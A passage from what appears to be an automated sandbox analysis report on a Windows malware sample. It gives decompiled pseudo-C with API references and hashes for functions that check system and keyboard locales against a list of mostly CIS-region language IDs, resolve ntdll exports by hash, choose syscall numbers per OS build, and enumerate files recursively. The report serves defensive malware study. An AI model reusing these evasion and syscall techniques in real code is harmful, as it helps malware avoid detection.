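What a match triggers is not in the visible part of E00401F03; what the table tells a sandbox operator is that a machine whose UI language, or (on the example's assumption) an installed keyboard layout, is one of these ten locales sends the function down a different path, which matters when reproducing the sample's behaviour on a non-default image. The port passed as 0x8b3 in E00405002 is TCP 2227 only if E00404FF6 is htons; the listing does not show that routine, so treat the port as an inference and the address as the stated fact.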

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 531 401f03-401f74 GetUserDefaultUILanguage 532 401f7e-401f85 531->532 533 401f87-401f96 532->533 534 401f9d-401fd5 call 4035c3 * 2 GetKeyboardLayoutList 532->534 536 401f98 533->536 537 401f9b 533->537 542 401fd7-401fdb 534->542 543 402018-402029 call 4035c3 534->543 536->537 537->532 544 401fe5-401fec 542->544 544->543 546 401fee-402016 call 4035c3 544->546 546->544
                                                  C-Code - Quality: 24%
                                                  			E00401F03() {
                                                  				signed int _v5;
                                                  				signed int _v6;
                                                  				signed int _v12;
                                                  				signed char _v16;
                                                  				short _v18;
                                                  				short _v20;
                                                  				short _v22;
                                                  				short _v24;
                                                  				short _v26;
                                                  				short _v28;
                                                  				short _v30;
                                                  				short _v32;
                                                  				short _v34;
                                                  				short _v36;
                                                  				struct HKL__* _v236;
                                                  				signed char _t65;
                                                  				void* _t75;
                                                  				void* _t76;
                                                  				void* _t77;
                                                  
                                                  				_v36 = 0x419;
                                                  				_v34 = 0x422;
                                                  				_v32 = 0x423;
                                                  				_v30 = 0x42c;
                                                  				_v28 = 0x42b;
                                                  				_v26 = 0x43f;
                                                  				_v24 = 0x440;
                                                  				_v22 = 0x438;
                                                  				_v20 = 0x428;
                                                  				_v18 = 0x443;
                                                  				__imp__GetUserDefaultUILanguage(); // executed
                                                  				_v12 = 0x443;
                                                  				_v6 = 0;
                                                  				while((_v6 & 0x000000ff) < 0xa) {
                                                  					if(( *(_t75 + (_v6 & 0x000000ff) * 2 - 0x20) & 0x0000ffff) == (_v12 & 0x0000ffff)) {
                                                  						goto _v36;
                                                  					}
                                                  					_v6 = _v6 + 1;
                                                  				}
                                                  				E004035C3(__eflags, 0, "- SystemLayout %d\r\n", _v12 & 0x0000ffff);
                                                  				_t77 = _t76 + 0xc;
                                                  				_push("- KeyboardLayouts: ( ");
                                                  				_push(0);
                                                  				E004035C3(__eflags);
                                                  				_v16 = GetKeyboardLayoutList(0x32,  &_v236);
                                                  				__eflags = _v16;
                                                  				if(__eflags > 0) {
                                                  					_v5 = 0;
                                                  					while(1) {
                                                  						__eflags = (_v5 & 0x000000ff) - _v16;
                                                  						if(__eflags >= 0) {
                                                  							goto L11;
                                                  						}
                                                  						E004035C3(__eflags, 0, "{%d} ",  *(_t75 + (_v5 & 0x000000ff) * 4 - 0xe8) & 0x0000ffff);
                                                  						_t77 = _t77 + 0xc;
                                                  						 *(_t75 + (_v5 & 0x000000ff) * 4 - 0xe8) =  *(_t75 + (_v5 & 0x000000ff) * 4 - 0xe8) & 0x00000000;
                                                  						_t65 = _v5 + 1;
                                                  						__eflags = _t65;
                                                  						_v5 = _t65;
                                                  					}
                                                  				}
                                                  				L11:
                                                  				_push(" )\r\n");
                                                  				_push(0);
                                                  				return E004035C3(__eflags);
                                                  			}


                                                  APIs
                                                  • GetUserDefaultUILanguage.KERNELBASE ref: 00401F66
                                                  • GetKeyboardLayoutList.USER32(00000032,?), ref: 00401FC8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.588258601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                  Similarity
                                                  • API ID: DefaultKeyboardLanguageLayoutListUser
                                                  • String ID: )$- KeyboardLayouts: ( $- SystemLayout %d${%d}
                                                  • API String ID: 167087913-619012376
                                                  • Opcode ID: f3efbf5d261d81c50e15a178c400749c002c505840b7dad8446bb3638f507242
                                                  • Instruction ID: 7c4dfc43665810f5058d3247ce6cdcd449f2bd336ab1effd38bbbbeb3a057cdb
                                                  • Opcode Fuzzy Hash: f3efbf5d261d81c50e15a178c400749c002c505840b7dad8446bb3638f507242
                                                  • Instruction Fuzzy Hash: 9731AF54D18298AAEB005FE494027FDBB70AF14305F1050ABF948F62D2D67D4B49D76E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph (rendered as a figure in the original report; the executed/not-executed legend and raw edge list are not reproduced here)
                                                  C-Code - Quality: 75%
                                                  			E00404511(intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                  				char _v8;
                                                  				short _v12;
                                                  				char _v16;
                                                  				void* _v20;
                                                  				char _v24;
                                                  				signed int _t23;
                                                  				void* _t25;
                                                  				intOrPtr _t34;
                                                  				intOrPtr _t35;
                                                  				intOrPtr _t36;
                                                  				signed char _t40;
                                                  				intOrPtr _t42;
                                                  				short _t43;
                                                  				short _t45;
                                                  				short _t46;
                                                  				short _t48;
                                                  				short _t50;
                                                  				short _t52;
                                                  				short _t53;
                                                  				short _t54;
                                                  				short _t55;
                                                  				short _t56;
                                                  				short _t61;
                                                  				void* _t62;
                                                  
                                                  				if( *0x4080b4 != 0) {
                                                  					L56:
                                                  					_t23 =  *0x4084c0; // 0x55
                                                  					L57:
                                                  					return _t23 & 0xffffff00 | _t23 != 0x00000000;
                                                  				}
                                                  				_t25 = VirtualAlloc(0, 0x20, 0x3000, 0x40); // executed
                                                  				 *0x4080b4 = _t25;
                                                  				if(_t25 == 0) {
                                                  					goto L56;
                                                  				}
                                                  				_v16 = 0x6c64746e;
                                                  				_t3 =  &_v16; // 0x6c64746e
                                                  				_v12 = 0x6c;
                                                  				_v24 = 0xd09c750;
                                                  				_v20 = 0;
                                                  				if(E0040439A(_t3,  &_v24) != 1) {
                                                  					return 0;
                                                  				}
                                                  				_t62 =  *0x4080b4; // 0xed0000
                                                  				E00403533(_t62, _v24, 0x1e);
                                                  				_t40 = 0;
                                                  				while( *((char*)(_t62 + (_t40 & 0x000000ff))) != 0xc2) {
                                                  					_t40 = _t40 + 1;
                                                  					if(_t40 < 0x20) {
                                                  						continue;
                                                  					}
                                                  					L8:
                                                  					_v8 = 0;
                                                  					__imp__IsWow64Process(GetCurrentProcess(),  &_v8);
                                                  					E00404ECE( &_v8, 1);
                                                  					_t34 = _a8;
                                                  					if(_v8 != 1) {
                                                  						if(_t34 != 5) {
                                                  							if(_t34 != 6) {
                                                  								_t42 = _a16;
                                                  								if(_t34 != 0xa) {
                                                  									if(_t34 != 0xb) {
                                                  										goto L56;
                                                  									}
                                                  									L47:
                                                  									 *0x4084c0 = 0x8e0178;
                                                  									 *0x4084c6 = 0xbc;
                                                  									_t23 = 0x178;
                                                  									if(_t42 == 0x3fab || _t42 == 0x42ee || _t42 == 0x4563 || _t42 == 0x47ba || _t42 == 0x47bb) {
                                                  										_t43 = 0x18d;
                                                  									} else {
                                                  										_t43 = 0x18e;
                                                  									}
                                                  									 *0x4084c4 = _t43;
                                                  									goto L57;
                                                  								}
                                                  								if(_t42 != 0x2800) {
                                                  									if(_t42 != 0x295a) {
                                                  										if(_t42 != 0x3839) {
                                                  											if(_t42 != 0x3ad7) {
                                                  												goto L47;
                                                  											}
                                                  											_t23 = 0x175;
                                                  											 *0x4084c0 = 0x8d0175;
                                                  											 *0x4084c4 = 0xbb018a;
                                                  											goto L57;
                                                  										}
                                                  										_t23 = 0x172;
                                                  										 *0x4084c0 = 0x8d0172;
                                                  										 *0x4084c4 = 0xba0185;
                                                  										goto L57;
                                                  									}
                                                  									_t23 = 0x170;
                                                  									 *0x4084c0 = 0x8c0170;
                                                  									 *0x4084c4 = 0xb80183;
                                                  									goto L57;
                                                  								}
                                                  								_t23 = 0x16e;
                                                  								 *0x4084c0 = 0x8c016e;
                                                  								 *0x4084c4 = 0xb80180;
                                                  								goto L57;
                                                  							}
                                                  							_t35 = _a12;
                                                  							if(_t35 != 0) {
                                                  								if(_t35 != 1) {
                                                  									if(_t35 != 2) {
                                                  										if(_t35 != 3) {
                                                  											goto L56;
                                                  										}
                                                  										_t23 = 0x168;
                                                  										 *0x4084c0 = 0x8a0168;
                                                  										 *0x4084c4 = 0xb60179;
                                                  										goto L57;
                                                  									}
                                                  									_t23 = 0x163;
                                                  									 *0x4084c0 = 0x870163;
                                                  									 *0x4084c4 = 0xb30174;
                                                  									goto L57;
                                                  								}
                                                  								_t23 = 0x42;
                                                  								 *0x4084c2 = 0x111;
                                                  								_t45 = 0x32;
                                                  								 *0x4084c4 = _t45;
                                                  								_t46 = 0xe7;
                                                  								L32:
                                                  								 *0x4084c0 = _t23;
                                                  								 *0x4084c6 = _t46;
                                                  								goto L57;
                                                  							}
                                                  							_t23 = 0x3c;
                                                  							 *0x4084c2 = 0x102;
                                                  							_t48 = 0x30;
                                                  							 *0x4084c4 = _t48;
                                                  							_t46 = 0xe1;
                                                  							goto L32;
                                                  						}
                                                  						if(_a12 != 1) {
                                                  							if(_a12 != 2) {
                                                  								goto L56;
                                                  							}
                                                  							_t23 = 0x27;
                                                  							 *0x4084c2 = 0xbf;
                                                  							_t50 = 0x1b;
                                                  							 *0x4084c4 = _t50;
                                                  							_t18 = _t23 + 0x77; // 0x9e
                                                  							_t46 = _t18;
                                                  							goto L32;
                                                  						}
                                                  						_t23 = 0x25;
                                                  						 *0x4084c2 = 0xb7;
                                                  						_t52 = 0x19;
                                                  						 *0x4084c4 = _t52;
                                                  						_t46 = _t52 + 0x7e;
                                                  						goto L32;
                                                  					}
                                                  					_t53 = 5;
                                                  					if(_t34 != _t53) {
                                                  						_t61 = 6;
                                                  						if(_t34 != _t61) {
                                                  							if(_t34 == 0xa || _t34 == 0xb) {
                                                  								_t23 = 0x55;
                                                  								_t54 = 0xf;
                                                  								 *0x4084c2 = _t61;
                                                  								_push(0x11);
                                                  								L11:
                                                  								 *0x4084c4 = _t54;
                                                  								_pop(_t46);
                                                  								goto L32;
                                                  							} else {
                                                  								goto L56;
                                                  							}
                                                  						}
                                                  						_t36 = _a12;
                                                  						if(_t36 == 0 || _t36 == 1) {
                                                  							goto L10;
                                                  						} else {
                                                  							if(_t36 != 2) {
                                                  								if(_t36 != 3) {
                                                  									goto L56;
                                                  								}
                                                  								_t23 = 0x54;
                                                  								 *0x4084c2 = _t53;
                                                  								_t54 = 0xe;
                                                  								_push(0x10);
                                                  								goto L11;
                                                  							}
                                                  							_t23 = 0x53;
                                                  							_t56 = 4;
                                                  							 *0x4084c2 = _t56;
                                                  							_t54 = 0xd;
                                                  							_push(0xf);
                                                  							goto L11;
                                                  						}
                                                  					}
                                                  					L10:
                                                  					_t23 = 0x52;
                                                  					_t55 = 3;
                                                  					 *0x4084c2 = _t55;
                                                  					_t54 = 0xc;
                                                  					_push(0xe);
                                                  					goto L11;
                                                  				}
                                                  				 *((char*)(_t62 + (_t40 & 0x000000ff))) = 0xc3;
                                                  				goto L8;
                                                  			}

                                                  0x004045f4
                                                  0x004045f7
                                                  0x0040463a
                                                  0x00404647
                                                  0x0040464a
                                                  0x0040464b
                                                  0x00404652
                                                  0x004045e5
                                                  0x004045e5
                                                  0x004045ec
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040463a
                                                  0x004045f9
                                                  0x004045fe
                                                  0x00000000
                                                  0x00404604
                                                  0x00404607
                                                  0x00404620
                                                  0x00000000
                                                  0x00000000
                                                  0x00404628
                                                  0x0040462b
                                                  0x00404632
                                                  0x00404633
                                                  0x00000000
                                                  0x00404633
                                                  0x0040460b
                                                  0x0040460e
                                                  0x00404611
                                                  0x00404618
                                                  0x00404619
                                                  0x00000000
                                                  0x00404619
                                                  0x004045fe
                                                  0x004045d3
                                                  0x004045d5
                                                  0x004045d8
                                                  0x004045db
                                                  0x004045e2
                                                  0x004045e3
                                                  0x00000000
                                                  0x004045e3
                                                  0x0040459b
                                                  0x00000000

                                                  APIs
                                                  • VirtualAlloc.KERNELBASE(00000000,00000020,00003000,00000040,?,?,?,?,?,?,004022B7), ref: 00404532
                                                    • Part of subcall function 0040439A: GetModuleHandleA.KERNEL32(ntdl,0000011C,?,?,?,?,?,?,?,004044D8), ref: 004043AC
                                                    • Part of subcall function 0040439A: LoadLibraryA.KERNELBASE(ntdl,?,?,?,?,?,?,?,004044D8), ref: 004043B9
                                                  • GetCurrentProcess.KERNEL32(004022B7), ref: 004045A6
                                                  • IsWow64Process.KERNEL32(00000000), ref: 004045AD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.588258601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                  Similarity
                                                  • API ID: Process$AllocCurrentHandleLibraryLoadModuleVirtualWow64
                                                  • String ID: l$ntdl
                                                  • API String ID: 1207166019-924918826
                                                  • Opcode ID: 11c04c657aee3ca3113d695794a80b48e7e56eb1af845e21d89bbdb6a6985c97
                                                  • Instruction ID: d089819bd469ed1c6df92899057766de468798ce60c5d806d11cdafc58a6e4c0
                                                  • Opcode Fuzzy Hash: 11c04c657aee3ca3113d695794a80b48e7e56eb1af845e21d89bbdb6a6985c97
                                                  • Instruction Fuzzy Hash: 1F81F3B561420196EB64AB10EF5577A3264FB91714F204A3FE359BB3E0EBBC8944870E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 100%
                                                  			E004034F0(long __ecx) {
                                                  				void* _t2;
                                                  				long _t6;
                                                  
                                                  				_t6 = __ecx;
                                                  				EnterCriticalSection(0x4084d4);
                                                  				_t2 = RtlAllocateHeap(GetProcessHeap(), 8, _t6); // executed
                                                  				LeaveCriticalSection(0x4084d4);
                                                  				return _t2;
                                                  			}

                                                  APIs
                                                  • EnterCriticalSection.KERNEL32(004084D4,?,?,00403B95,?,0040223F), ref: 004034FA
                                                  • GetProcessHeap.KERNEL32(00000008,?,?,?,00403B95,?,0040223F), ref: 00403503
                                                  • RtlAllocateHeap.NTDLL(00000000,?,?,?,00403B95,?,0040223F), ref: 0040350A
                                                  • LeaveCriticalSection.KERNEL32(004084D4,?,?,?,00403B95,?,0040223F), ref: 00403513
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.588258601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                  Similarity
                                                  • API ID: CriticalHeapSection$AllocateEnterLeaveProcess
                                                  • String ID:
                                                  • API String ID: 1367039788-0
                                                  • Opcode ID: 5daea72f964e7636f02427a4c362df6db173182dc9c09987e3f6e00f20fc304f
                                                  • Instruction ID: 01b6da944b15f1f6a327e9d37539a73d2033df78cda66d77d48fdf02a98fd039
                                                  • Opcode Fuzzy Hash: 5daea72f964e7636f02427a4c362df6db173182dc9c09987e3f6e00f20fc304f
                                                  • Instruction Fuzzy Hash: 9BD05E32E0812067C61017B9BE0C99BBA6CEF85662705427AB209E3160CAB85801C7AA
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 100%
                                                  			E0040439A(CHAR* __ecx, intOrPtr __edx) {
                                                  				char _v5;
                                                  				signed int _v12;
                                                  				intOrPtr _v16;
                                                  				intOrPtr _v20;
                                                  				signed int _v24;
                                                  				intOrPtr _v28;
                                                  				intOrPtr _v32;
                                                  				intOrPtr _v36;
                                                  				intOrPtr* _t55;
                                                  				intOrPtr _t59;
                                                  				void* _t63;
                                                  				struct HINSTANCE__* _t67;
                                                  				signed int _t70;
                                                  				signed char _t72;
                                                  				signed int _t78;
                                                  				intOrPtr _t87;
                                                  				CHAR* _t89;
                                                  				intOrPtr _t90;
                                                  				struct HINSTANCE__* _t91;
                                                  
                                                  				_t89 = __ecx;
                                                  				_v16 = __edx;
                                                  				_v5 = 0;
                                                  				_t91 = GetModuleHandleA(__ecx);
                                                  				if(_t91 != 0) {
                                                  					L3:
                                                  					if(_t91->i != 0x5a4d) {
                                                  						L17:
                                                  						return _v5;
                                                  					}
                                                  					_t55 =  *((intOrPtr*)(_t91 + 0x3c)) + _t91;
                                                  					if( *_t55 != 0x4550 || ( *(_t55 + 0x16) & 0x00002000) == 0) {
                                                  						goto L17;
                                                  					} else {
                                                  						_t90 =  *((intOrPtr*)(_t55 + 0x78));
                                                  						if(_t90 == 0 ||  *((intOrPtr*)(_t55 + 0x7c)) == 0) {
                                                  							goto L17;
                                                  						} else {
                                                  							_v32 =  *((intOrPtr*)(_t90 + _t91 + 0x1c)) + _t91;
                                                  							_t70 = 0;
                                                  							_v28 =  *((intOrPtr*)(_t90 + _t91 + 0x24)) + _t91;
                                                  							_t59 =  *((intOrPtr*)(_t90 + _t91 + 0x20)) + _t91;
                                                  							_v12 = 0;
                                                  							_v36 = _t59;
                                                  							if( *((intOrPtr*)(_t90 + _t91 + 0x18)) <= 0) {
                                                  								L16:
                                                  								goto L17;
                                                  							} else {
                                                  								goto L9;
                                                  							}
                                                  							do {
                                                  								L9:
                                                  								_t87 = _v16;
                                                  								_t61 =  *((intOrPtr*)(_t59 + _t70 * 4)) + _t91;
                                                  								_v20 =  *((intOrPtr*)(_t59 + _t70 * 4)) + _t91;
                                                  								_t72 = 0;
                                                  								while(1) {
                                                  									_t78 = _t72 & 0x000000ff;
                                                  									_v24 = _t78;
                                                  									if( *((intOrPtr*)(_t87 + _t78 * 4)) == 0) {
                                                  										goto L15;
                                                  									}
                                                  									_t63 = E00403B10(_v20, E0040360D(_t61));
                                                  									_t87 = _v16;
                                                  									if(_t63 ==  *((intOrPtr*)(_t87 + _v24 * 4))) {
                                                  										_v5 = _v5 + 1;
                                                  										 *((intOrPtr*)(_t87 + (_t72 & 0x000000ff) * 4)) =  *((intOrPtr*)(_v32 + ( *(_v28 + _v12 * 2) & 0x0000ffff) * 4)) + _t91;
                                                  										goto L15;
                                                  									}
                                                  									_t61 = _v20;
                                                  									_t72 = _t72 + 1;
                                                  									if(_t72 < 0xff) {
                                                  										continue;
                                                  									}
                                                  									goto L15;
                                                  								}
                                                  								L15:
                                                  								_t59 = _v36;
                                                  								_t70 = _v12 + 1;
                                                  								_v12 = _t70;
                                                  							} while (_t70 <  *((intOrPtr*)(_t90 + _t91 + 0x18)));
                                                  							goto L16;
                                                  						}
                                                  					}
                                                  				}
                                                  				_t67 = LoadLibraryA(_t89); // executed
                                                  				_t91 = _t67;
                                                  				if(_t91 != 0) {
                                                  					goto L3;
                                                  				}
                                                  				return 0;
                                                  			}

                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(ntdl,0000011C,?,?,?,?,?,?,?,004044D8), ref: 004043AC
                                                  • LoadLibraryA.KERNELBASE(ntdl,?,?,?,?,?,?,?,004044D8), ref: 004043B9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.588258601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                  Similarity
                                                  • API ID: HandleLibraryLoadModule
                                                  • String ID: ntdl
                                                  • API String ID: 4133054770-3973061744
                                                  • Opcode ID: bb975948d5144e8028468e35f4164474a17020fb09ec80fee4ec3faf1ab27720
                                                  • Instruction ID: e779b2b9bf78415574e85168f99cd85def5d5433ec81a0b2a41e32fde102af36
                                                  • Opcode Fuzzy Hash: bb975948d5144e8028468e35f4164474a17020fb09ec80fee4ec3faf1ab27720
                                                  • Instruction Fuzzy Hash: D531D0B5E00215DBCB24CF98C480BBEB7B4FF89314F0442AAD941B7381D778A951CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E0040402B(WCHAR* __ecx) {
                                                  				signed int _t3;
                                                  
                                                  				_t3 = GetFileAttributesW(__ecx); // executed
                                                  				return _t3 & 0xffffff00 | _t3 != 0xffffffff;
                                                  			}

                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(00F7E960,00401035,00F7E960), ref: 0040402C
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.588258601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: a2429e95e03fbe04962fd54191d71f113076e8e98f946da1f9df0c77c0fda816
                                                  • Instruction ID: 8544705db56f1641149a42f7d76e29180c22dde16af9b5027a828299b5c9a162
                                                  • Opcode Fuzzy Hash: a2429e95e03fbe04962fd54191d71f113076e8e98f946da1f9df0c77c0fda816
                                                  • Instruction Fuzzy Hash: 29A022B80300008BCA2C23300F0A00F32000F0B2F03220B2CA033E80E0EA38C0C00002
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 95%
                                                  			E00403EAA(intOrPtr __ecx, void* __edx, void* __eflags, signed short _a4, intOrPtr _a8, char _a12) {
                                                  				intOrPtr _v12;
                                                  				intOrPtr _v16;
                                                  				void* _v20;
                                                  				struct _WIN32_FIND_DATAW _v616;
                                                  				WCHAR* _t29;
                                                  				void* _t34;
                                                  				void* _t36;
                                                  				void* _t37;
                                                  				signed int _t45;
                                                  				void* _t50;
                                                  				void* _t52;
                                                  				signed short _t68;
                                                  				WCHAR* _t73;
                                                  				void* _t77;
                                                  				void* _t78;
                                                  
                                                  				_t52 = __edx;
                                                  				_v16 = __ecx;
                                                  				_t29 = E0040402B(__edx);
                                                  				if(_t29 != 0) {
                                                  					_t29 = E004034F0(0x208);
                                                  					_t73 = _t29;
                                                  					if(_t73 != 0) {
                                                  						_t75 = E004034F0(0x208);
                                                  						_v12 = _t75;
                                                  						_t82 = _t75;
                                                  						if(_t75 == 0) {
                                                  							L13:
                                                  							return E0040351E(_t73);
                                                  						}
                                                  						E004035E8(_t82, _t73, L"%s\\*", __edx);
                                                  						_t78 = _t77 + 0xc;
                                                  						_t34 = FindFirstFileW(_t73,  &_v616);
                                                  						_v20 = _t34;
                                                  						if(_t34 == 0xffffffff) {
                                                  							L12:
                                                  							E0040351E(_t75);
                                                  							goto L13;
                                                  						} else {
                                                  							goto L4;
                                                  						}
                                                  						do {
                                                  							L4:
                                                  							_t36 = E00403623(_t52);
                                                  							_t37 = E00403623( &(_v616.cFileName));
                                                  							_t84 = _t37 + 3 + _t36 - 0x104;
                                                  							if(_t37 + 3 + _t36 >= 0x104) {
                                                  								L10:
                                                  								_t75 = _v12;
                                                  								goto L11;
                                                  							}
                                                  							_push( &(_v616.cFileName));
                                                  							E004035E8(_t84, _t73, L"%s\\%s", _t52);
                                                  							_t78 = _t78 + 0x10;
                                                  							if(_a12 == 0 || (_v616.dwFileAttributes & 0x00000010) == 0 || E00403713( &(_v616.cFileName), L"..") == 0) {
                                                  								L15:
                                                  								__eflags = _v616.dwFileAttributes & 0x000000a7;
                                                  								if((_v616.dwFileAttributes & 0x000000a7) == 0) {
                                                  									goto L10;
                                                  								}
                                                  								_t68 = _a4;
                                                  								_t75 = _v12;
                                                  								_t45 = (_t68 & 0x0000ffff) + 1;
                                                  								__eflags = _t68;
                                                  								_t62 =  !=  ?  &(_t73[_t45]) :  &(_v616.cFileName);
                                                  								_push( !=  ?  &(_t73[_t45]) :  &(_v616.cFileName));
                                                  								E004035E8(__eflags, _v12, L"%s%s", _a8);
                                                  								E00403E66(_v16, _t73, __eflags, _t75);
                                                  								_t78 = _t78 + 0x14;
                                                  							} else {
                                                  								_t50 = E00403713( &(_v616.cFileName), ".");
                                                  								_t88 = _t50;
                                                  								if(_t50 == 0) {
                                                  									goto L15;
                                                  								}
                                                  								E00403EAA(_v16, _t73, _t88, _a4, _a8, 1);
                                                  								_t78 = _t78 + 0xc;
                                                  								goto L10;
                                                  							}
                                                  							L11:
                                                  						} while (FindNextFileW(_v20,  &_v616) != 0);
                                                  						goto L12;
                                                  					}
                                                  				}
                                                  				return _t29;
                                                  			}

                                                  APIs
                                                    • Part of subcall function 0040402B: GetFileAttributesW.KERNELBASE(00F7E960,00401035,00F7E960), ref: 0040402C
                                                    • Part of subcall function 004034F0: EnterCriticalSection.KERNEL32(004084D4,?,?,00403B95,?,0040223F), ref: 004034FA
                                                    • Part of subcall function 004034F0: GetProcessHeap.KERNEL32(00000008,?,?,?,00403B95,?,0040223F), ref: 00403503
                                                    • Part of subcall function 004034F0: RtlAllocateHeap.NTDLL(00000000,?,?,?,00403B95,?,0040223F), ref: 0040350A
                                                    • Part of subcall function 004034F0: LeaveCriticalSection.KERNEL32(004084D4,?,?,?,00403B95,?,0040223F), ref: 00403513
                                                  • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 00403F0B
                                                  • FindNextFileW.KERNEL32(0040174B,?), ref: 00403FAC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.588258601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                  Similarity
                                                  • API ID: File$CriticalFindHeapSection$AllocateAttributesEnterFirstLeaveNextProcess
                                                  • String ID: %s%s$%s\%s$%s\*
                                                  • API String ID: 674214967-2064654797
                                                  • Opcode ID: cabad34e7e7135359c44172283c1635a289dbe4081dd430380b879a4a189ccb9
                                                  • Instruction ID: 0d19af2fd814e55343d0ea9ba16141ed1d132e68cf772a52d048647e9719b3e8
                                                  • Opcode Fuzzy Hash: cabad34e7e7135359c44172283c1635a289dbe4081dd430380b879a4a189ccb9
                                                  • Instruction Fuzzy Hash: 92310271E002196BCB20AE218C45AAEBB7D9B80706F0441BAF805B73D1EB3D9F018789
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 97%
                                                  			E00404068(intOrPtr __ecx, intOrPtr __edx, void* _a4) {
                                                  				intOrPtr _v12;
                                                  				intOrPtr _v16;
                                                  				struct _WIN32_FIND_DATAW _v608;
                                                  				signed int _t32;
                                                  				signed int _t39;
                                                  				WCHAR* _t40;
                                                  				int _t46;
                                                  				intOrPtr _t48;
                                                  				WCHAR* _t49;
                                                  				WCHAR* _t59;
                                                  				signed int* _t68;
                                                  				WCHAR* _t69;
                                                  
                                                  				_t68 = _a4;
                                                  				_t48 = __ecx;
                                                  				_v12 = __edx;
                                                  				_v16 = __ecx;
                                                  				if( *((intOrPtr*)(__ecx +  *_t68 * 4)) != 0) {
                                                  					_t69 = E004034F0(0x208);
                                                  					__eflags = _t69;
                                                  					if(__eflags == 0) {
                                                  						L14:
                                                  						return _t69;
                                                  					}
                                                  					E004035E8(__eflags, _t69, L"%s\\*", _v12);
                                                  					_a4 = FindFirstFileW(_t69,  &_v608);
                                                  					_t32 = E00403623(_t69);
                                                  					__eflags = _a4 - 0xffffffff;
                                                  					 *((short*)(_t69 + _t32 * 2 - 4)) = 0;
                                                  					if(_a4 == 0xffffffff) {
                                                  						goto L14;
                                                  					} else {
                                                  						goto L4;
                                                  					}
                                                  					while(1) {
                                                  						L4:
                                                  						__eflags = E00403B10( &(_v608.cFileName), E00403623( &(_v608.cFileName)) + _t33) -  *((intOrPtr*)(_t48 +  *_t68 * 4));
                                                  						if(__eflags == 0) {
                                                  							break;
                                                  						}
                                                  						_t46 = FindNextFileW(_a4,  &_v608);
                                                  						__eflags = _t46;
                                                  						if(_t46 != 0) {
                                                  							continue;
                                                  						}
                                                  						L11:
                                                  						_t39 =  *_t68;
                                                  						__eflags =  *(_t48 + _t39 * 4);
                                                  						if( *(_t48 + _t39 * 4) == 0) {
                                                  							goto L14;
                                                  						} else {
                                                  							goto L12;
                                                  						}
                                                  						do {
                                                  							L12:
                                                  							_t39 = _t39 + 1;
                                                  							__eflags =  *(_t48 + _t39 * 4);
                                                  						} while ( *(_t48 + _t39 * 4) != 0);
                                                  						 *_t68 = _t39;
                                                  						goto L14;
                                                  					}
                                                  					_push( &(_v608.cFileName));
                                                  					E004035E8(__eflags, _t69, L"%s\\%s", _t69);
                                                  					 *_t68 =  *_t68 + 1;
                                                  					_t49 = E00404068(_t48, _t69, _t68);
                                                  					__eflags = _t49;
                                                  					if(_t49 == 0) {
                                                  						L10:
                                                  						_t48 = _v16;
                                                  						goto L11;
                                                  					}
                                                  					_t40 = E00403713(_t49, _t69);
                                                  					_t59 = _t69;
                                                  					__eflags = _t40;
                                                  					if(_t40 != 0) {
                                                  						E004036C7(_t59, _t49);
                                                  						E0040351E(_t49);
                                                  						goto L14;
                                                  					}
                                                  					E004036C7(_t59, _v12);
                                                  					E0040351E(_t49);
                                                  					goto L10;
                                                  				}
                                                  				return 0;
                                                  			}

                                                  APIs
                                                  • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004040BB
                                                  • FindNextFileW.KERNEL32(000000FF,?), ref: 00404107
                                                    • Part of subcall function 0040351E: GetProcessHeap.KERNEL32(00000000,00000000,00403026,?,?,?,?,?,?,?,?,?,?,?,004035DC,?), ref: 00403525
                                                    • Part of subcall function 0040351E: RtlFreeHeap.NTDLL(00000000,?,?,?,?,?,?,?,?,?,?,?,004035DC,?,00000400,?), ref: 0040352C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.588258601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                  Similarity
